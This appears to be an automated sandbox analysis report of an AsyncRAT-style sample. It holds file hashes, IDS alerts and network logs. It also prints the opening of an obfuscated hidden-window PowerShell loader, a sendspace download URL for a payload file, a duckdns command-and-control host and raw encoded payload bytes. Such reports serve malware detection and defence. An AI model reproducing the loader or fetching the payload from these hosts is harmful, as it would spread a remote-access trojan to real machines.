MD5: ae6a3a8912f6dd675542cc40cb5c6088
SHA1: ba9cf3a09d51ab5f090fc9dac6f1253321c922e4
SHA256: cfbbcd80b1537d3ba3b27a57002496542db471094bae1612abc70bac5fd80808
SHA512: ac34dd4755fa9a5ba35c5c404aea505a5ef26b2ece6dc8f6bc7e65a7fc934e17af60aa208aab74fbf2719086c9e9dd0a1c85548d740967ecce27483e89778699
SSDEEP: 192:oeOol1MILxFMeVO+BqDwoJK7bE9COaJppuq8TH6+Q/:ocjMIdSHwowbLuqkH6+Q/
TLSH: C3D14DABB23B20394F1E157C7DB18C025F51682B51266F7296295ADEA4C3C40E0FAF85
File Content Preview: start /min powershell.exe -windowstyle hidden "$Lassoing = 1;$Rasophore='Sub';$Rasophore+='strin';$Rasophore+='g';Function Ugedagens($Outdure){$Frys=$Outdure.Length-$Lassoing;For($Interproducing=5;$Interproducing -lt $Frys;$Interproducing+=6){$Unlecherous
Icon Hash: 9686878b929a9886

Timestamp                 Protocol  SID      Message                                               Source Port  Dest Port  Source IP        Dest IP
05/23/24-21:03:56.699407  TCP       2035595  ET TROJAN Generic AsyncRAT Style SSL Cert             8797         49711      112.202.180.134  192.168.2.6
05/23/24-21:03:56.699407  TCP       2030673  ET TROJAN Observed Malicious SSL Cert (AsyncRAT Server)  8797      49711      112.202.180.134  192.168.2.6

Timestamp                             Source Port  Dest Port  Source IP     Dest IP
May 23, 2024 21:03:00.238656044 CEST  49699        443        192.168.2.6   104.21.28.80
May 23, 2024 21:03:00.238694906 CEST  443          49699      104.21.28.80  192.168.2.6
May 23, 2024 21:03:00.238771915 CEST  49699        443        192.168.2.6   104.21.28.80
May 23, 2024 21:03:00.250078917 CEST  49699        443        192.168.2.6   104.21.28.80
May 23, 2024 21:03:00.250093937 CEST  443          49699      104.21.28.80  192.168.2.6
May 23, 2024 21:03:00.721167088 CEST  443          49699      104.21.28.80  192.168.2.6
May 23, 2024 21:03:00.721265078 CEST  49699        443        192.168.2.6   104.21.28.80
May 23, 2024 21:03:00.725183964 CEST  49699        443        192.168.2.6   104.21.28.80
May 23, 2024 21:03:00.725193977 CEST  443          49699      104.21.28.80  192.168.2.6
May 23, 2024 21:03:00.725425005 CEST  443          49699      104.21.28.80  192.168.2.6
May 23, 2024 21:03:00.737905979 CEST  49699        443        192.168.2.6   104.21.28.80
May 23, 2024 21:03:00.778490067 CEST  443          49699      104.21.28.80  192.168.2.6
May 23, 2024 21:03:00.981204033 CEST  443          49699      104.21.28.80  192.168.2.6
May 23, 2024 21:03:00.981265068 CEST  443          49699      104.21.28.80  192.168.2.6
May 23, 2024 21:03:00.981369019 CEST  49699        443        192.168.2.6   104.21.28.80
May 23, 2024 21:03:01.036201954 CEST  49699        443        192.168.2.6   104.21.28.80
May 23, 2024 21:03:01.120737076 CEST  49700        443        192.168.2.6   69.31.136.57
May 23, 2024 21:03:01.120781898 CEST  443          49700      69.31.136.57  192.168.2.6
May 23, 2024 21:03:01.120919943 CEST  49700        443        192.168.2.6   69.31.136.57
May 23, 2024 21:03:01.121517897 CEST  49700        443        192.168.2.6   69.31.136.57
May 23, 2024 21:03:01.121531963 CEST  443          49700      69.31.136.57  192.168.2.6
May 23, 2024 21:03:02.103631973 CEST  443          49700      69.31.136.57  192.168.2.6
May 23, 2024 21:03:02.103773117 CEST  49700        443        192.168.2.6   69.31.136.57
May 23, 2024 21:03:02.106656075 CEST  49700        443        192.168.2.6   69.31.136.57
May 23, 2024 21:03:02.106666088 CEST  443          49700      69.31.136.57  192.168.2.6
May 23, 2024 21:03:02.107038975 CEST  443          49700      69.31.136.57  192.168.2.6
May 23, 2024 21:03:02.108335018 CEST  49700        443        192.168.2.6   69.31.136.57
May 23, 2024 21:03:02.150492907 CEST  443          49700      69.31.136.57  192.168.2.6
May 23, 2024 21:03:02.408648968 CEST  443          49700      69.31.136.57  192.168.2.6
May 23, 2024 21:03:02.408679962 CEST  443          49700      69.31.136.57  192.168.2.6
May 23, 2024 21:03:02.408698082 CEST  443          49700      69.31.136.57  192.168.2.6
May 23, 2024 21:03:02.408761024 CEST  49700        443        192.168.2.6   69.31.136.57
May 23, 2024 21:03:02.408778906 CEST  443          49700      69.31.136.57  192.168.2.6
May 23, 2024 21:03:02.408811092 CEST  49700        443        192.168.2.6   69.31.136.57
May 23, 2024 21:03:02.408833981 CEST  49700        443        192.168.2.6   69.31.136.57
May 23, 2024 21:03:02.432322025 CEST  443          49700      69.31.136.57  192.168.2.6
May 23, 2024 21:03:02.432344913 CEST  443          49700      69.31.136.57  192.168.2.6
May 23, 2024 21:03:02.432463884 CEST  49700        443        192.168.2.6   69.31.136.57
May 23, 2024 21:03:02.432491064 CEST  443          49700      69.31.136.57  192.168.2.6
May 23, 2024 21:03:02.432528019 CEST  49700        443        192.168.2.6   69.31.136.57
May 23, 2024 21:03:02.498148918 CEST  443          49700      69.31.136.57  192.168.2.6
May 23, 2024 21:03:02.498172045 CEST  443          49700      69.31.136.57  192.168.2.6
May 23, 2024 21:03:02.498251915 CEST  49700        443        192.168.2.6   69.31.136.57
May 23, 2024 21:03:02.498265982 CEST  443          49700      69.31.136.57  192.168.2.6
May 23, 2024 21:03:02.498301029 CEST  49700        443        192.168.2.6   69.31.136.57
May 23, 2024 21:03:02.516700029 CEST  443          49700      69.31.136.57  192.168.2.6
May 23, 2024 21:03:02.516717911 CEST  443          49700      69.31.136.57  192.168.2.6
May 23, 2024 21:03:02.516781092 CEST  49700        443        192.168.2.6   69.31.136.57
May 23, 2024 21:03:02.516788006 CEST  443          49700      69.31.136.57  192.168.2.6
May 23, 2024 21:03:02.516844988 CEST  49700        443        192.168.2.6   69.31.136.57
May 23, 2024 21:03:02.532845974 CEST  443          49700      69.31.136.57  192.168.2.6
May 23, 2024 21:03:02.532866955 CEST  443          49700      69.31.136.57  192.168.2.6
May 23, 2024 21:03:02.532924891 CEST  49700        443        192.168.2.6   69.31.136.57
May 23, 2024 21:03:02.532932043 CEST  443          49700      69.31.136.57  192.168.2.6
May 23, 2024 21:03:02.532968044 CEST  49700        443        192.168.2.6   69.31.136.57
May 23, 2024 21:03:02.544464111 CEST  443          49700      69.31.136.57  192.168.2.6
May 23, 2024 21:03:02.544481993 CEST  443          49700      69.31.136.57  192.168.2.6
May 23, 2024 21:03:02.544616938 CEST  49700        443        192.168.2.6   69.31.136.57
                                                                                              May 23, 2024 21:03:02.544624090 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.544708014 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.589982033 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.590003967 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.590095997 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.590104103 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.590145111 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.602592945 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.602610111 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.602653980 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.602660894 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.602705956 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.602722883 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.618289948 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.618307114 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.618359089 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.618365049 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.618400097 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.627022982 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.627042055 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.627125978 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.627132893 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.627171040 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.636631012 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.636647940 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.636718988 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.636725903 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.636761904 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.680526972 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.680547953 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.680687904 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.680706024 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.680744886 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.688232899 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.688251019 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.688338995 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.688348055 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.688386917 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.695287943 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.695305109 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.695359945 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.695368052 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.695400953 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.701086998 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.701107025 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.701163054 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.701174021 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.701216936 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.706595898 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.706613064 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.706651926 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.706660032 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.706696033 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.706715107 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.711600065 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.711618900 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.711688995 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.711697102 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.711745024 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.716095924 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.716115952 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.716176987 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.716183901 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.716217041 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.720231056 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.720247030 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.720302105 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.720309973 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.720343113 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.766474009 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.766498089 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.766640902 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.766654968 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.766715050 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.769834042 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.769854069 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.769913912 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.769921064 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.769953966 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.774296045 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.774312019 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.774375916 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.774384975 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.774419069 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.784976959 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.784993887 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.785059929 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.785073996 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.785110950 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.787935019 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.787950993 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.787992001 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.788002968 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.788048983 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.788070917 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.790657997 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.790674925 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.790724993 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.790731907 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.790766001 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.793601036 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.793617010 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.793663025 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.793672085 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.793682098 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.793704033 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.796314955 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.796329975 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.796380043 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.796389103 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.796427011 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.857446909 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.857465982 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.857506037 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.857517958 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.857558966 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.860075951 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.860093117 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.860132933 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.860141039 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.860177994 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.862355947 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.862391949 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.862420082 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.862426043 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.862446070 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.862467051 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.862703085 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:47.735172033 CEST49708443192.168.2.6104.21.28.80
                                                                                              May 23, 2024 21:03:47.735219955 CEST44349708104.21.28.80192.168.2.6
                                                                                              May 23, 2024 21:03:47.735323906 CEST49708443192.168.2.6104.21.28.80
                                                                                              May 23, 2024 21:03:47.849853039 CEST49708443192.168.2.6104.21.28.80
                                                                                              May 23, 2024 21:03:47.849884987 CEST44349708104.21.28.80192.168.2.6
                                                                                              May 23, 2024 21:03:48.354563951 CEST44349708104.21.28.80192.168.2.6
                                                                                              May 23, 2024 21:03:48.354691982 CEST49708443192.168.2.6104.21.28.80
                                                                                              May 23, 2024 21:03:49.941158056 CEST49708443192.168.2.6104.21.28.80
                                                                                              May 23, 2024 21:03:49.941184998 CEST44349708104.21.28.80192.168.2.6
                                                                                              May 23, 2024 21:03:49.941555977 CEST44349708104.21.28.80192.168.2.6
                                                                                              May 23, 2024 21:03:49.941715002 CEST49708443192.168.2.6104.21.28.80
                                                                                              May 23, 2024 21:03:49.947578907 CEST49708443192.168.2.6104.21.28.80
                                                                                              May 23, 2024 21:03:49.990493059 CEST44349708104.21.28.80192.168.2.6
                                                                                              May 23, 2024 21:03:50.170835018 CEST44349708104.21.28.80192.168.2.6
                                                                                              May 23, 2024 21:03:50.170938015 CEST44349708104.21.28.80192.168.2.6
                                                                                              May 23, 2024 21:03:50.171045065 CEST49708443192.168.2.6104.21.28.80
                                                                                              May 23, 2024 21:03:50.171143055 CEST49708443192.168.2.6104.21.28.80
                                                                                              May 23, 2024 21:03:50.184950113 CEST49708443192.168.2.6104.21.28.80
                                                                                              May 23, 2024 21:03:50.184972048 CEST44349708104.21.28.80192.168.2.6
                                                                                              May 23, 2024 21:03:50.226385117 CEST49709443192.168.2.669.31.136.17
                                                                                              May 23, 2024 21:03:50.226435900 CEST4434970969.31.136.17192.168.2.6
                                                                                              May 23, 2024 21:03:50.226586103 CEST49709443192.168.2.669.31.136.17
                                                                                              May 23, 2024 21:03:50.226954937 CEST49709443192.168.2.669.31.136.17
                                                                                              May 23, 2024 21:03:50.226977110 CEST4434970969.31.136.17192.168.2.6
                                                                                              May 23, 2024 21:03:51.044821978 CEST4434970969.31.136.17192.168.2.6
                                                                                              May 23, 2024 21:03:51.045083046 CEST49709443192.168.2.669.31.136.17
                                                                                              May 23, 2024 21:03:51.053014040 CEST49709443192.168.2.669.31.136.17
                                                                                              May 23, 2024 21:03:51.053037882 CEST4434970969.31.136.17192.168.2.6
                                                                                              May 23, 2024 21:03:51.053406000 CEST4434970969.31.136.17192.168.2.6
                                                                                              May 23, 2024 21:03:51.053476095 CEST49709443192.168.2.669.31.136.17
                                                                                              May 23, 2024 21:03:51.060946941 CEST49709443192.168.2.669.31.136.17
                                                                                              May 23, 2024 21:03:51.102554083 CEST4434970969.31.136.17192.168.2.6
                                                                                              May 23, 2024 21:03:51.308095932 CEST4434970969.31.136.17192.168.2.6
                                                                                              May 23, 2024 21:03:51.308136940 CEST4434970969.31.136.17192.168.2.6
                                                                                              May 23, 2024 21:03:51.308156013 CEST4434970969.31.136.17192.168.2.6
                                                                                              May 23, 2024 21:03:51.308346987 CEST49709443192.168.2.669.31.136.17
                                                                                              May 23, 2024 21:03:51.308346987 CEST49709443192.168.2.669.31.136.17
                                                                                              May 23, 2024 21:03:51.308379889 CEST4434970969.31.136.17192.168.2.6
                                                                                              May 23, 2024 21:03:51.308437109 CEST49709443192.168.2.669.31.136.17
                                                                                              May 23, 2024 21:03:51.329765081 CEST4434970969.31.136.17192.168.2.6
                                                                                              May 23, 2024 21:03:51.329791069 CEST4434970969.31.136.17192.168.2.6
                                                                                              May 23, 2024 21:03:51.329886913 CEST49709443192.168.2.669.31.136.17
                                                                                              May 23, 2024 21:03:51.329916954 CEST4434970969.31.136.17192.168.2.6
                                                                                              May 23, 2024 21:03:51.329962969 CEST49709443192.168.2.669.31.136.17
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|
| May 23, 2024 21:03:00.218532085 CEST | 63525 | 53 | 192.168.2.6 | 1.1.1.1 |
| May 23, 2024 21:03:00.233020067 CEST | 53 | 63525 | 1.1.1.1 | 192.168.2.6 |
| May 23, 2024 21:03:01.068005085 CEST | 54766 | 53 | 192.168.2.6 | 1.1.1.1 |
| May 23, 2024 21:03:01.119997978 CEST | 53 | 54766 | 1.1.1.1 | 192.168.2.6 |
| May 23, 2024 21:03:50.196595907 CEST | 59794 | 53 | 192.168.2.6 | 1.1.1.1 |
| May 23, 2024 21:03:50.225409985 CEST | 53 | 59794 | 1.1.1.1 | 192.168.2.6 |
| May 23, 2024 21:03:55.836729050 CEST | 53977 | 53 | 192.168.2.6 | 1.1.1.1 |
| May 23, 2024 21:03:55.983450890 CEST | 53 | 53977 | 1.1.1.1 | 192.168.2.6 |
| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|
| May 23, 2024 21:03:00.218532085 CEST | 192.168.2.6 | 1.1.1.1 | 0xdaf | Standard query (0) | www.sendspace.com | A (IP address) | IN (0x0001) | false |
| May 23, 2024 21:03:01.068005085 CEST | 192.168.2.6 | 1.1.1.1 | 0x4d47 | Standard query (0) | fs13n2.sendspace.com | A (IP address) | IN (0x0001) | false |
| May 23, 2024 21:03:50.196595907 CEST | 192.168.2.6 | 1.1.1.1 | 0x95cb | Standard query (0) | fs03n5.sendspace.com | A (IP address) | IN (0x0001) | false |
| May 23, 2024 21:03:55.836729050 CEST | 192.168.2.6 | 1.1.1.1 | 0x5843 | Standard query (0) | dhhj.duckdns.org | A (IP address) | IN (0x0001) | false |
| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|---|---|
| May 23, 2024 21:03:00.233020067 CEST | 1.1.1.1 | 192.168.2.6 | 0xdaf | No error (0) | www.sendspace.com | | 104.21.28.80 | A (IP address) | IN (0x0001) | false |
| May 23, 2024 21:03:00.233020067 CEST | 1.1.1.1 | 192.168.2.6 | 0xdaf | No error (0) | www.sendspace.com | | 172.67.170.105 | A (IP address) | IN (0x0001) | false |
| May 23, 2024 21:03:01.119997978 CEST | 1.1.1.1 | 192.168.2.6 | 0x4d47 | No error (0) | fs13n2.sendspace.com | | 69.31.136.57 | A (IP address) | IN (0x0001) | false |
| May 23, 2024 21:03:50.225409985 CEST | 1.1.1.1 | 192.168.2.6 | 0x95cb | No error (0) | fs03n5.sendspace.com | | 69.31.136.17 | A (IP address) | IN (0x0001) | false |
| May 23, 2024 21:03:55.983450890 CEST | 1.1.1.1 | 192.168.2.6 | 0x5843 | No error (0) | dhhj.duckdns.org | | 12.202.180.134 | A (IP address) | IN (0x0001) | false |
                                                                                              • www.sendspace.com
                                                                                              • fs13n2.sendspace.com
                                                                                              • fs03n5.sendspace.com
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 0 | 192.168.2.6 | 49699 | 104.21.28.80 | 443 | 5700 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Timestamp / Bytes transferred / Direction / Data

2024-05-23 19:03:00 UTC, 174 bytes, OUT:
GET /pro/dl/w4e2qb HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Host: www.sendspace.com
Connection: Keep-Alive

2024-05-23 19:03:00 UTC, 942 bytes, IN:
HTTP/1.1 301 Moved Permanently
Date: Thu, 23 May 2024 19:03:00 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: SID=lp3b25c2hbnmrb6kb64dvn0hp1; path=/; domain=.sendspace.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: https://fs13n2.sendspace.com/dlpro/5990f4102977ad47c8b1158344464586/664f92e4/w4e2qb/Bystoerrelse.fla
Vary: Accept-Encoding
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fiyBzdx6Wfv8lzYgfxG2KvHcOGNfELHzCu66oP4j9zTk%2BE9AmVb1qnPoI37opFa3wvS6VguQOuJ0ThnAay3mm%2BZkSvRvOVjNlN3MwIyCEe106EBn6%2FtreqrxA6PEY1i2V6TAhA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 88874db61c9c436d-EWR
alt-svc: h3=":443"; ma=86400

2024-05-23 19:03:00 UTC, 5 bytes, IN:
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 1 | 192.168.2.6 | 49700 | 69.31.136.57 | 443 | 5700 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Timestamp / Bytes transferred / Direction / Data

2024-05-23 19:03:02 UTC, 235 bytes, OUT:
GET /dlpro/5990f4102977ad47c8b1158344464586/664f92e4/w4e2qb/Bystoerrelse.fla HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Host: fs13n2.sendspace.com
Connection: Keep-Alive

2024-05-23 19:03:02 UTC, 501 bytes, IN:
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 23 May 2024 19:03:02 GMT
Content-Type: application/octet-stream
Content-Length: 488392
Last-Modified: Mon, 20 May 2024 13:20:02 GMT
Connection: close
Set-Cookie: SID=2dlqm080h9k0t55in6pmpifbu0; path=/; domain=.sendspace.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Disposition: attachment;filename="Bystoerrelse.fla"
ETag: "664b4e02-773c8"
Accept-Ranges: bytes
                                                                                              2024-05-23 19:03:02 UTC16384INData Raw: 36 61 50 4c 66 66 46 38 63 46 76 58 71 64 4c 74 4d 4d 6d 59 76 41 6d 73 6b 51 41 63 36 7a 4a 59 44 44 71 7a 6c 63 6d 73 4d 52 4b 76 67 46 42 59 45 59 58 2f 42 39 4f 72 4b 34 44 4d 67 6a 33 2f 73 6a 45 2f 65 4d 75 74 56 4d 52 6c 6f 53 79 59 30 74 70 59 79 64 4e 75 61 61 6b 38 32 72 4a 59 4f 64 42 4f 57 78 4e 46 68 55 58 31 6a 54 2b 54 30 36 73 71 76 35 7a 71 48 42 5a 4e 76 47 53 49 73 37 42 35 50 64 52 48 49 49 67 35 39 4b 6e 65 54 48 51 31 4b 71 4e 2f 2b 56 6f 7a 41 53 32 71 4a 6d 4d 67 58 39 65 56 4f 61 73 55 56 4e 52 59 30 59 55 2f 6b 39 4f 72 4b 6b 79 32 4d 54 38 30 79 36 34 46 78 53 71 5a 4c 4a 73 33 4f 4e 4b 61 54 30 77 6d 57 78 4f 78 36 34 6b 6a 57 4d 70 62 45 52 53 48 75 30 34 78 4c 36 42 50 55 51 35 4a 62 36 38 6f 58 54 53 63 6a 6b 36 4e 75 43 53
                                                                                              Data Ascii: 6aPLffF8cFvXqdLtMMmYvAmskQAc6zJYDDqzlcmsMRKvgFBYEYX/B9OrK4DMgj3/sjE/eMutVMRloSyY0tpYydNuaak82rJYOdBOWxNFhUX1jT+T06sqv5zqHBZNvGSIs7B5PdRHIIg59KneTHQ1KqN/+VozAS2qJmMgX9eVOasUVNRY0YU/k9OrKky2MT80y64FxSqZLJs3ONKaT0wmWxOx64kjWMpbERSHu04xL6BPUQ5Jb68oXTScjk6NuCS
